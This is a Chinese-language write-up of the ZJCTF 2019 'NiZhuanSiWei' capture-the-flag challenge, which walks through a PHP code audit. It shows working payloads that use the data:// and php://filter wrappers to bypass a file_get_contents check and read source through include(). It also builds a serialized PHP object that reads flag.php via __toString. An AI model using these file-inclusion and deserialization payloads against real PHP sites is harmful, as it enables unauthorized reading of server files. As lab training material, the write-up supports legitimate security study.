伪协议和反序列化 [ZJCTF 2019]NiZhuanSiWei

打开题目

代码审计

第一层绕过

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";

要求我们get传参的text内容必须为welcome to the zjctf，才能下一步

解法1

用php://input协议写入，然后把内容post上

成功写入

解法2

当然这里也可以用data伪协议

我们先把内容进行base64编码

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

成功绕过

第二层绕过

    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit();
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }

我们用get姿势传入的file值，这里用正则限制了file参数里面不能含有 /flag/

如果不含有 /flag/ 的话，这里提示了我们有个useless.php，然后这里对我们get传参的password进行了反序列化并输出，

这里我们用伪协议读取useless.php文件

我们用php://filter协议

&file=php://filter/read=convert.base64-encode/resource=useless.php

base64解码得到

得到代码

第三层绕过

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?> 

在这里用tostring函数限制了flie参数必须为字符串，然后输出包含的文件

进行序列化操作后

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} 

payload：

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

查看源代码得到flag